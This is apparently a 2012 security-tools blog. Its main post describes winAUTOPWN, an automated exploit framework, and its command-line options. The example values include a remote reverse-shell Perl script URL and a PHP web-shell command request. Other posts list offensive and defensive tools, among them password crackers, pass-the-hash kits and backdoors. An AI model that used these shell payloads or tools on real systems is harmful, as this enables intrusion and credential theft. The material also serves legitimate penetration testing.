Wednesday, December 12, 2012

winAUTOPWN - Automated Vulnerability Testing

WinAUTOPWN: 

                       is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.


                                   WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares.


                               Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various Operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly and this can aide is checking if the WAF is preventing / alerting accordingly against such threats or no. Similarly shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS.

                                WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is a just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.



 
Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:


How to use command-line in winAUTOPWN ?

Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :
  • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.
    Example winAUTOPWN.exe –skipscan
  • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .
    Example winAUTOPWN.exe –onlyscan
  • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe –targetIP 192.168.3.3
  • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.
    Example winAUTOPWN.exe –targetHOST SYSTEM-2
    winAUTOPWN.exe –targetHOST www.somewebsite9.com
  • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe –attackerIP 192.168.3.34
  • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –cmsPATH /xampp
  • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
    winAUTOPWN.exe –actcmsPATH /opt/xampp
  • -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls
    You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
  • -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
  • -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –cmsadminUSR admin9
  • -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.
    Example winAUTOPWN.exe –ftpUSR user6
  • -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.
    Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
  • -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl . Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
    Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
  • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
    Example winAUTOPWN.exe –mailFROM admin@some.web.info
  • -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
    Example winAUTOPWN.exe –mailTO postmaster@some.web.info
  • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.
    Example winAUTOPWN.exe –proxyIP 192.168.3.80
  • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it.
    Example winAUTOPWN.exe –proxyIP 8080


    What are the other WELF Scripting Terminologies?

    can be , , OR (for exe files)
    is the filename of the Exploit. Ex: exploitname.exe
    is your Target’s IP address. Ex: 10.40.140.1
    is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
    is your IP. Ex: 10.40.140.144
    is the Target CMS Path. Ex: /awstats
    is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
    is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
    is a admin username for the Target CMS.
    is FTP/CMS Username
    is FTP/CMS Password.
    is Proxy IP address to be used for some exploits to pass through
    is Proxy Port Number to be used for some exploits to pass through
    is the CMS Path with a trailing slah. Ex: /awstats/
    is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
    is the typical complete address of the Target Hostname alongwith the CMS Path. Ex: www.somesite.com/awstats<
    is the typical complete address of the Target Hostname alongwith the CMS Path with a trailing slash. Ex: www.somesite.com/awstats/
    is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
    is the Target HostName following the standard http:// . Ex: http://www.somesite.com
    is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
    is the sender’s email address to be used in a few SMTP exploits.
    is the receiver’s email address to be used in a few SMTP exploits.
    Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
    PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
    PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
    bitweaver_firecmd.exe ^^^^

    To run the above script, as mentioned earlier run
    winAUTOPWN.exe –welf myWELFexploits.txt 


Download Link : Click Here

Back-up Link : Click Here

Reference link : Click Here

Direct Link : Click Here

ScoopyNG - VMware detection tool

ScoopyNG:
             combines the detection tricks of Scoopy Doo and Jerry as well as some new techniques to determine if a current OS is running inside a VMware Virtual Machine (VM) or on a native system.

ScoopyNG should work on all modern uni-, multi- and multi-core cpu's.




ScoopyNG is able to detect VMware even if "anti-detection-mechanisms" are deployed.

Download : 
                 Windows Version: ScoopyNG v1.0

Wednesday, October 17, 2012

ServerShield - Open Source Linux Hardening Tool

Server Shield:
            is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resistant to many basic and advanced attacks

Automatic security updates are enabled by default, including the self-updating of Server Shield. If you are running a modified version of Server Shield you should turn self-updating off so your changes don't get overwritten. Support for servers with multiple IP addresses will be added soon.

Features

  • Slowloris Protection
  • Firewall Hardening
  • TCP Hardening
  • ICMP/Ping Flood Protection
  • DoS Protection
  • Spoof Protection
  • FTP/SSH Bruteforce Protection
  • Automatic Security Updates
  • Disables Bash History
  • DNS Amplification Protection

Installation

git clone https://github.com/Brian-Holt/server-shield

cd server-shield;chmod +x sshield;mv sshield /etc/init.d

/etc/init.d/sshield start    

Requirements

Server Shield depends on several pieces of open source software to function properly. If yum is available, the following packages will be silently installed and kept up to date:
  • yum-security
  • iptables
  • nmap
  • net-tools
  • sed
  • gawk
  • git
  • apache-devel
 Download Link : Click Here

 Reference Link : Click Here

Friday, August 24, 2012

NmapSI4 - Port Scanner ( Nmap GUI )

NmapSI4 :

             Qt4-based Gui Tools with the design goals to provide a complete Nmap GUI interface for Users, in order to management all options of this powerful security net Port & Vulnerability Scanner!









Features


  • Traceroute support with Nmap
  • Host Lookup with internal implementation or dig.
  • Search services vulnerabilities with Webkit dedicated browser.
  • Full Nmap NSE support.
  • Search network IPS with "Network Discover" tool.
  • Support for create scan user profile.
  • Host scan with Nmap.

 Snapshots :





Download Link :

Google Code : Click Here
Source Forge : Click Here

Thanks To ALL .


Sunday, August 19, 2012

2012 - Information Security Free / open source Tools

Information Security tools  List:

                                         You can find a lot of security tools on the internet. But it is hard to find the right tool for the right job. Here you will be able to download firewall analyzers and several security tools.
If you believe we missed out on a security tool you can send us an message or simply post it as an comment.

Real time protection

Avast! Free
Ad-Aware Free
AVG Free
Panda Cloud Free
Avira free antivirus Free
Microsoft Security Essentials Free
Comodo Free
Fprot (with Returnil) Free
PC Tools Free Free
FortiClient Lite Free
Unthreat Antivirus Free
Preventon Free
Rising Free
Zillya! Free
NANO Free
Digital Defender Free
ClearSight Free
Zoner Free
BkavHome Free
CMC Infosec Free
Clam Sentinel Free
Moon Secure Free
ZenOK Free
Ainvo Antivirus Free

Portable anti-virus programs

DrWeb cureit
Emsisoft Emergency USB Stick files
Avira DE-Cleaner
Microsoft Safety Scanner
AVZ / AVZ database
Norman malware cleaner
Superantispyware
Panda ActiveScan Cleaner
Trendmicro Sysclean
NoVirusThanks
ArcaVir MicroScan
Zillya! Scanner
Spybot Portable
ClamWin Portable
Guardiano Assembler

Anti Root kit

TDSS Killer
Avast MBR Scanner
Gmer
RootRepeal
Kernel Detective
SpyDllRemover
VBA anti-rootkit
Sanity check
Rootkit Unhooker
Bitdefender Bootkit Removal Tool
RootkitRemover
mbr tool
catchme
Rootkitty
Kill bootkits
Hypersight Rootkit Detector
Rkdetector

Firewall analyzer

Security is effective when you know what is going on in your environment. The most of us protect ourselves with Firewalls, IDS, IPS and multiple monitor tools.
These devices and tools all create logfiles that can be analyzed to
Software Free / Paid Download link
Firemon Paid http://www.firemon.com
Barracudanetworks Paid http://www.barracudanetworks.com
Splunk Paid http://www.splunk.com

Monitor tools

If you want to monitor your environment you can use these monitor tools to find out what is happening in your environment.
Software FREE / Paid Download link
Zenoss Core Free http://community.zenoss.org/
NTA Monitor Free http://www.nta-monitor.com/tools/ike-scan/

Sniffers

Do you need to analyze an packet? You can use this packet analyzers to sniff packets that cross your network. You can analyze network problems, detect network intrusion attempts and more.
Software Free / Paid Download link
Wireshark Free http://www.wireshark.org
NMAP Free http://nmap.org/

Code Review Tools

Tools to review code.
Software Free / Paid Download link
Rough Auditing Tool for Security Free https://www.fortify.com

Config Review Tools

Tools to review config files.
Software Free / Paid Download link
Apache Benchmark Free http://www.cisecurity.org/
Microsoft Best Practice Analyzer Paid http://www.microsoft.com

Database Tools

Software Free / Paid Download link
SQL Server Express Utility Free http://www.microsoft.com
MySQL Command-Line Tool Free http://dev.mysql.com/
Leviathan Free http://leviathan.sourceforge.net/
WinSQL without installer Free http://web.synametrics.com/rawfiles.htm

Debugging Tools

Software Free / Paid Download link
OllyDbg Free http://www.ollydbg.de/
Free
Free
Free

Forensic Tools

Software Free / Paid Download link
Mandiant Red Curtain Free http://www.mandiant.com/
Mandiant Red Line Free http://www.mandiant.com/
Free
Free

Fuzzer Tools

Software Free / Paid Download link
Skipfish Free http://code.google.com/p/skipfish/
WSFuzzer Project Free https://www.owasp.org/
FileFuzz Free http://www.securiteam.com/tools
Fuzzdb Free http://code.google.com/p/fuzzdb/

SAP tools

Software Free / Paid Download link
SAPYTO Free http://www.security-database.com/

Backdoor Tools

Software Free / Paid Download link
TINI Free http://ntsecurity.nu/toolbox/tini/

Brute Force Tools

Software Free / Paid Download link
Hydra Brute Force Utility Free http://www.madirish.net/
BRUTUS Free http://www.hoobie.net/brutus/
TSGrinder Free http://www.hammerofgod.com/
Patator Free http://code.google.com/p/patator/

Truecrack Password cracking for truecrypt encrypted volume files click here

Interception Tools

Software Free / Paid Download link
Echomirage Free http://www.bindshell.net/tools/

Password Cracking Tools

Software Free / Paid Download link
Cain & Abel Free http://www.oxid.it/cain.html
John the Ripper Free http://www.openwall.com/john/
Ophcrack Free http://ophcrack.sourceforge.net/

Password Retrieval Tools

Have you lost your password and you need to retrieve your password? Then take a look at these password retrieval tools.
Software Free / Paid Download link
Creddump Free http://code.google.com/p/creddump/
FGdump Free http://www.foofus.net/~fizzgig/fgdump/
Pass-The-Hash toolkit Free http://oss.coresecurity.com/
PWdump Free http://www.foofus.net/~fizzgig/pwdump/

Token Impersionation Tools

Software Free / Paid Download link
Incognito Free http://sourceforge.net/projects/incognito/
Pass-The-Hash toolkit Free http://oss.coresecurity.com/
Windows Credentials Editor Free http://www.ampliasecurity.com/research.html

LIVE CD's

Software Free / Paid Download link
Backtrack Free http://www.backtrack-linux.org/
Hiren Free http://www.hiren.info/pages/bootcd

Great Tool resources

Software Free / Paid Download link
HackArmoury Free http://hackarmoury.com/tools
Microsoft Free http://www.microsoft.com/download/
Phenoelit Free http://phenoelit.org/fr/tools.html
techsupportalert Free Massive tools list

Kaspersky Free Tools

Kaspersky Virus Removal Tool free Virus Removal Tool is a utility designed to remove all types of infections from your computer. It implies effective algorithms of detection used by Kaspersky Anti-Virus and AVZ. It cannot substitute a resident antivirus application.

http://www.kaspersky.com/antivirus-removal-tool-register
Kaspersky Rescue Disk 10 free Kaspersky Rescue Disk is designed to scan, disinfect and restore infected operating systems. It should be used when it is impossible to boot the operating system.

http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso
Kaspersky

Security Scan
free Kaspersky Security Scan provides a free-of-charge, easy way to find viruses and other threats that may be hidden on your PC… plus get advice on your PC’s security status.

http://products.kaspersky-labs.com/products/multilanguage/special/kss2/kss12.0.1.117mlg_en_ru_fr_de.exe

Mandiant free tools



Redline

Mandiant Redline is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.
More

IOC Editor

Mandiant IOC Editor is a free editor for Indicators of Compromise (IOCs).
More

IOC Finder

Mandiant IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).
More

Memoryze

Free memory forensics software designed to help incident responders find evil within live memory.
More

Audit Viewer

Audit Viewer is an open source tool that allows users to examine the results of Memoryze's analysis.
More

Highlighter

Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files.
More

Red Curtain

Software for incident responders that helps find and analyze unknown malware.
More

Web Historian

Assists users in reviewing websites that are stored in the history files of the most commonly used browsers.
More

Research: PdbXtract

PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.
More

Research: Mandiant ApateDNS

ApateDNS is a tool for controlling DNS responses though an easy to use graphical user interface (GUI).
More

Research: Mandiant Find Evil

A malware discovery tool which uses disassembly to detect packed executables.
More

Research: Mandiant Heap Inspector

Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.
More

Research: Mandiant Metasploit Forensic Framework

The Metasploit Forensic Framework (MSFF) is a proof of concept tool that can potentially reconstruct an attacker's meterpreter sessions.
More

Research: Mandiant MindSniffer

MindSniffer is a tool that will allow the user to translate snort signatures to either XML jobs or Python plug-ins that can be used to identify processes containing strings that match snort signatures.
More

Research: Mandiant Restore Point Analyzer

A simple forensic tool to analyze change.log files from restore points to determine the original paths and file names of files stored inside restore points.
More



BindShell Tools link
BeEF
BeEF is the browser exploitation framework. Its purposes in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF. Some of the basic functionality includes Keylogging and Clipboard Theft.
Become
The become utility changes the current effective, or real, user and group identity to those specified on the command line. The default shell (/bin/sh) is then executed.
UID and GID are specified numercially and do not have to be currently defined on the system.
Lots of fun when playing around with other peoples NFS exports.
Coder
A windows utility to encode and decode various encoding schemes. Currently supports Base64, Hex, HTTP URL Encoding and MD5.
Dnetj
Dnetj is a distributed client/server version of John the ripper.
It is operated in much the same way as distributed.net or setiathome, but is designed to crack password hash files.
ETrace
ETrace is a configurable static port network tracing tool, similar to traceroute, but supporting ICMP, TCP, UDP and other IP protocols.
Echo Mirage
Echo Mirage is a generic network proxy. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified.
GenIP
IA small utility, based on the NMap target specification code, for quickly and easily generating lists of IP addresses.
ICMPScan
Does what it says on the tin: Scans the specified address, or addresses, for ICMP responses. Handles echo (type 8 ), timestamp (type 13), address mask (type 17), information (type 15) and router solicitation (type 10) requests.
John The Ripper MPI Patch
This is an updated version of Ryan Lim's patch for john the ripper to support MPI, in addition to a large number of third party patches to support additional ciphers and such.
MassResolve
This program performs multi-threaded reverse DNS lookups. It can be passed a netblock or a file of IP addresses to process.
ObexSend
ObexSend is a simple command line tool to transfer a file via OBEX FTP to a device with a Bluetooth interface. It requires the user to specify the MAC address of the desination device, the OBEX FTP channel and the name of the file to send.
Odysseus
Odysseus is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Odysseus will intercept an HTTP session's data in either direction and give the user the ability to alter the data before transmission.
RFIDTool
RFIDtool has been designed to perform atomic tasks on RFID tags. This focus allows for the tool to be easily incorporated into scripts to acheive more complex and useful tasks. One example is to load RFID tags with varying data depending up their storage size.
SSLCat
SSLCat is a netcat like utility with SSL support. SSLCat is a simple Unix utility that reads and writes data across an SSL enable network connection.
SSLCat accepts a hostname and optional port number (443 is used if none is specified) and attempts to form a SSLv2 connection to the specified host. If all goes well, data is read from stdin and sent across the encrypted connection, while incoming data from the encrypted connection is sent to stdout.
Screen Shooter
A windows utility to simplifies taking screen shots of either the currently focused window or the entire desktop. Screen Shooter uses configurable hot keys hot keys and supports Bitmap, GIF, JPEG, PNG and TIF image formats.
SynScan
A quick half-open port scanner. This tool will send TCP packets with the SYN flag set at the destination address. SynScan will send traffic as fast as the host network interface can support.
Telemachus
A companion utility for Odysseus allowing further analysis and manipulation of HTTP transactions.


This article is being updated on a regular basis.


Note: ONLY USE THESE TOOLS ON YOUR OWN NETWORK

Wednesday, August 15, 2012

Live CD - OWASP - Open Web Application Security Project

OWASP :

Open Web Application Security Project is a worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. 

 OWASP Live CD project was originally started to update the previous OWASP Live CD 2007.

OWASP Live CD installed to a physical or virtual hard drive (VMware) is available and work continues on making other versions of the project available including a bootable USB, portable VM installation, an installation for the Asus Eee PC. These are either downloadable files or instructions on how to create the alternate delivery mechanisms.

OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team. Tools and documents are organized into the following categories:
  • PROTECT - These are tools and documents that can be used to guard against security-related design and implementation flaws.
  • DETECT - These are tools and documents that can be used to find security-related design and implementation flaws.
  • LIFE CYCLE - These are tools and documents that can be used to add security-related activities into the Software Development Life Cycle (SDLC).





Video Tutorial : http://www.youtube.com/user/AppsecTutorialSeries

OWASP Live CD Download Link : Web Testing Environment (WTE) ISO

Username : owasp / Password  : owasp

OWASP Live CD VMWare Image Download Link : OWASP-livecd.vmx

Thanks to RRN Technologies Team

Tuesday, August 14, 2012

Backtrack 5 R3 released - Penetration Testing Tool

BackTrack 5 :

BackTrack is an Ubuntu-based distribution with a collection of security and forensics tools. It was created by merging Auditor Security Linux with WHAX (formerly Whoppix)..





The BackTrack Development team will be releasing an R3 revision of our Penetration Testing distribution in 2 weeks. This release focuses on bugfixes and over 50 new tool additions ΓÇô making it the most potent revision yet. We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags.  The DVD contains a BT5 R3 Gnome, 32 bit edition ΓÇô burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012. Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August. We hope you enjoy this fine release as much as we do!

You Tube : http://www.youtube.com/watch?v=Qb0orNRte9E

     Home Page          http://www.backtrack-linux.org/

Documentation http://www.backtrack-linux.org/wiki/
http://www.backtrack-linux.org/tutorials/


Download Mirrors http://www.backtrack-linux.org/downloads/


Download BackTrack 5 R3 release via torrent

BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)
 
Thanks To RRN Information Security Team.